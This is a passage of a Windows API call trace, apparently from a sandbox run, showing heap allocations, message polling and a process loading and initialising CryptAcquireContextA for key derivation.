RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0188.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.077] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.077] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.079] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.079] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0188.081] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0188.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0188.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a48 [0188.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0188.082] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0188.083] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0188.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0188.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0188.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0188.086] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.086] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0188.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0188.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0188.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0188.087] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) 